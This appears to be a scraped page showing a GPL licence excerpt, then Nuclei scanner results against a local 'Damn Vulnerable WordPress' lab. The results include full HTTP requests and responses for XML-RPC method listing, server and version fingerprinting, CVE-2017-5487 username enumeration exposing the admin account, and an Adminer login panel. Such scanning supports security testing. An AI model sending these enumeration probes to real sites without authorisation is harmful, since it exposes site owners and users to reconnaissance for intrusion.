MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
This program incorporates work covered by the following copyright and
permission notices:
b2 is (c) 2001, 2002 Michel Valdrighi - [email protected] -
http://tidakada.com
Wherever third party code has been used, credit has been given in the code's
comments.
b2 is released under the GPL
and
WordPress - Web publishing software
Copyright 2003-2010 by the contributors
WordPress is released under the GPL
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
langu.... Truncated ....
Generated by Nuclei
[wordpress-xmlrpc-listmethods] [info] Wordpress XML-RPC List System Methods found on http://127.0.0.1:31337
Details: wordpress-xmlrpc-listmethods matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/xmlrpc.php
Timestamp: Thu Jul 8 00:10:40 +0000 UTC 2021
Template Information
Key | Value |
---|---|
severity | info |
tags | wordpress |
name | Wordpress XML-RPC List System Methods |
author | 0ut0fb4nd |
Request
POST /xmlrpc.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 123
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml; charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:40 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=3CNAEjKfmew7pD4k187Oma34Y3yYWqqO; expires=Sat, 10-Jul-2021 00:10:40 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>demo.addTwoNumbers</string></value>
<value><string>demo.sayHello</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
<value><string>mt.getTrackbackPings</string></value>
<value><string>mt.supportedTextFilters</string></value>
<value><string>mt.supportedMethods</string></value>
<value><string>mt.setPostCategories</string></value>
<value><string>mt.getPostCategories</string></value>
<value><string>mt.getRecentPostTitles</string></value>
<value><string>mt.getCategoryList</string></value>
<value><string>metaWeblog.getUsersBlogs</string></value>
<value><string>metaWeblog.deletePost</string></value>
<value><string>metaWeblog.newMediaObject</string></value>
<value><string>metaWeblog.getCategories</string></value>
<value><string>metaWeblog.getRecentPosts</string></value>
<value><string>metaWeblog.getPost</string></value>
<value><string>metaWeblog.editPost</string></value>
<value><string>metaWeblog.newPost</string></value>
<value><string>blogger.deletePost</string></value>
<value><string>blogger.editPost</string></value>
<value><string>blogger.newPost</string></value>
<value><string>blogger.getRecentPosts</string></value>
<value><string>blogger.getPost</string></value>
<value><string>blogger.getUserInfo</string></value>
<value><string>blogger.getUsersBlogs</string></value>
<value><string>wp.restoreRevision</string></value>
<value><string>wp.getRevisions</string></value>
<value><string>wp.getPostTypes</string></value>
<value><string>wp.getPostType</string></value>
<value><string>wp.getPostFormats</string></value>
<value><string>wp.getMediaLibrary</string></value>
<value><string>wp.getMediaItem</string></value>
<value><string>wp.getCommentStatusList</string></value>
<value><string>wp.newComment</string></value>
<value><string>wp.editComment</string></value>
<value><string>wp.deleteComment</string></value>
<value><string>wp.getComments</string></value>
<value><string>wp.getComment</string></value>
<value><string>wp.setOptions</string></value>
<value><string>wp.getOptions</string></value>
<value><string>wp.getPageTemplates</string></value>
<value><string>wp.getPageStatusList</string></value>
<value><string>wp.getPostStatusList</string></value>
<value><string>wp.getCommentCount</string></value>
<value><string>wp.deleteFile</string></value>
<value><string>wp.uploadFile</string></value>
<value><string>wp.suggestCategories</string></value>
<value><string>wp.deleteCategory</string></value>
<value><string>wp.newCategory</string></value>
<value><string>wp.getTags</string></value>
<value><string>wp.getCategories</string></value>
<value><string>wp.getAuthors</string></value>
<value><string>wp.getPageList</string></value>
<value><string>wp.editPage</string></value>
<value><string>wp.deletePage</string></value>
<value><string>wp.newPage</string></value>
<value><string>wp.getPages</string></value>
<value><string>wp.getPage</string></value>
<value><string>wp.editProfile</string></value>
<value><string>wp.getProfile</string></value>
<value><string>wp.getUsers</string></value>
<value><string>wp.getUser</string></value>
<value><string>wp.getTaxonomies</string></value>
<value><string>wp.getTaxonomy</string></value>
<value><string>wp.getTerms</string></value>
<value><string>wp.getTerm</string></value>
<value><string>wp.deleteTerm</string></value>
<value><string>wp.editTerm</string></value>
<value><string>wp.newTerm</string></value>
<value><string>wp.getPosts</string></value>
<value><string>wp.getPost</string></value>
<value><string>wp.deletePost</string></value>
<value><string>wp.editPost</string></value>
<value><string>wp.newPost</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array>
</value>
</param>
</params>
</methodResponse>
Generated by Nuclei
[apache-version-detect] [info] Apache Version found on http://127.0.0.1:31337
Details: apache-version-detect matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Thu Jul 8 00:10:40 +0000 UTC 2021
Template Information
Key | Value |
---|---|
severity | info |
name | Apache Version |
author | philippedelteil |
description | Some Apache servers have the version on the response header. The OpenSSL version can be also obtained |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:40 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=SD6AbHwPsXm3bM97yWTWzmcK7zETErFe; expires=Sat, 10-Jul-2021 00:10:40 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Extra Information
Extracted results:
- Apache/2.4.38 (Debian)
Generated by Nuclei
[tech-detect:apache] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:apache matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Wed Jul 7 00:11:20 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
tags | tech |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:19 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=hCKbRjnKBTDQtQQdKBXshyXSkGyMxFrm; expires=Fri, 09-Jul-2021 00:11:19 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[CVE-2017-5487] [medium] WordPress Core < 4.7.1 - Username Enumeration found on http://127.0.0.1:31337
Details: CVE-2017-5487 matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/?rest_route=/wp/v2/users/
Timestamp: Wed Jul 7 00:11:24 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | WordPress Core < 4.7.1 - Username Enumeration |
author | Manas_Harsh,daffainfo |
severity | medium |
description | wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. |
tags | cve,cve2017,wordpress |
Request
GET /?rest_route=/wp/v2/users/ HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 584
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:24 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=qDdNkgPgHk6mpxpHszh3h6CNmCTaBdwS; expires=Fri, 09-Jul-2021 00:11:24 GMT; Max-Age=172800; path=/
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.1.33
X-Robots-Tag: noindex
X-Wp-Total: 1
X-Wp-Totalpages: 1
[{"id":1,"name":"admin","url":"","description":"","link":"http:\/\/127.0.0.1:31337\/?author=1","slug":"admin","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users"}]}}]
Reference:
Generated by Nuclei
[adminer-panel] [info] Adminer Login panel found on http://127.0.0.1:31337
Details: adminer-panel matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/adminer.php
Timestamp: Tue Jul 6 13:46:51 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | panel |
name | Adminer Login panel |
author | random_robbie,meme-lord |
severity | info |
Request
GET /adminer.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MzE1YmFlODc1MGIyYTUyODdkNzgzYTE0YzQ0NjU4ZDA=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Jul 2021 13:46:51 GMT
Referrer-Policy: origin-when-cross-origin
Server: Apache/2.4.38 (Debian)
Set-Cookie: adminer_sid=a6ba12737b47fff3f39e1ad0ddbf9a63; path=/adminer.php; HttpOnly
Set-Cookie: adminer_key=0ec83508c83efc5860504e1750b22758; path=/adminer.php; HttpOnly; SameSite=lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Powered-By: PHP/7.1.33
X-Xss-Protection: 0
<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="stylesheet" type="text/css" href="adminer.php?file=default.css&version=4.6.2">
<script src='adminer.php?file=functions.js&version=4.6.2' nonce="MzE1YmFlODc1MGIyYTUyODdkNzgzYTE0YzQ0NjU4ZDA="></script>
<link rel="shortcut icon" type="image/x-icon" href="adminer.php?file=favicon.ico&version=4.6.2">
<link rel="apple-touch-icon" href="adminer.php?file=favicon.ico&version=4.6.2">
<body class="ltr nojs">
<script nonce="MzE1YmFlODc1MGIyYTUyODdkNzgzYTE0YzQ0NjU4ZDA=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.2', 'adminer.php?', '835881:447079')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
<div id="help" class="jush-sql jsonly hidden"></div>
<script nonce="MzE1YmFlODc1MGIyYTUyODdkNzgzYTE0YzQ0NjU4ZDA=">mixin(qs('#help'), {onmouseover: function () { helpOpen = 1; }, onmouseout: helpMouseout});</script>
<div id="content">
<h2>Login</h2>
<div id='ajaxstatus' class='jsonly hidden'></div>
<form action='' method='post'>
<div></div>
<table cellspacing="0">
<tr><th>System<td><select name='auth[driver]'><option value="server" selected>MySQL<option value="sqlite">SQLite 3<option value="sqlite2">SQLite 2<option value="pgsql">PostgreSQL<option value="oracle">Oracle (beta)<option value="mssql">MS SQL (beta)<option value="firebird">Firebird (alpha)<option value="simpledb">SimpleDB<option value="mongo">MongoDB<option value="elastic">Elasticsearch (beta)</select>
<tr><th>Server<td><input name="auth[server]" value="" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
<tr><th>Username<td><input name="auth[username]" id="username" value="" autocapitalize="off">
<tr><th>Password<td><input type="password" name="auth[password]">
<tr><th>Database<td><input name="auth[db]" value="" autocapitalize="off">
</table>
<script nonce="MzE1YmFlODc1MGIyYTUyODdkNzgzYTE0YzQ0NjU4ZDA=">focus(qs('#username'));</script>
<p><input type='submit' value='Login'>
<label><input type='checkbox' name='auth[permanent]' value='1'>Permanent login</label>
</form>
</div>
<form action='' method='post'>
<div id='lang'>Language: <select name='lang'><option value="en" selected>English<option value="ar">العربية<option value="bg">Български<option value="bn">বাংলা<option value="bs">Bosanski<option value="ca">Català<option value="cs">Čeština<option value="da">Dansk<option value="de">Deutsch<option value="el">Ελληνικά<option value="es">Español<option value="et">Eesti<option value="fa">فارسی<option value="fi">Suomi<option value="fr">Français<option value="gl">Galego<option value="he">עברית<option value="hu">Magyar<option value="id">Bahasa Indonesia<option value="it">Italiano<option value="ja">日本語<option value="ko">한국어<option value="lt">Lietuvių<option value="ms">Bahasa Melayu<option value="nl">Nederlands<option value="no">Norsk<option value="pl">Polski<option value="pt">Português<option value="pt-br">Português (Brazil)<option value="ro">Limba Română<option value="ru">Русский<option value="sk">Slovenčina<option value="sl">Slovenski<option value="sr">Српски<option value="ta">தமிழ்<option value="th">ภาษาไทย<option value="tr">Türkçe<option value="uk">Українська<option value="vi">Tiếng Việt<option value="zh">简体中文<option value="zh-tw">繁體中文</select><script nonce="MzE1YmFlODc1MGIyYTUyODdkNzgzYTE0YzQ0NjU4ZDA=">qsl('select').onchange = function () { this.form.submit(); };</script> <input type='submit' value='Use' class='hidden'>
<input type='hidden' name='token' value='656713:5639'>
</div>
</form>
<div id="menu">
<h1>
<a href='https://www.adminer.org/' target="_blank" rel="noreferrer noopener" id='h1'>Adminer</a> <span class="version">4.6.2</span>
<a href="https://www.adminer.org/#download" target="_blank" rel="noreferrer noopener" id="version"></a>
</h1>
</div>
<script nonce="MzE1YmFlODc1MGIyYTUyODdkNzgzYTE0YzQ0NjU4ZDA=">setupSubmitHighlight(document);</script>
Extra Information
Extracted results:
- 4.6.2
Reference:
Generated by Nuclei
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.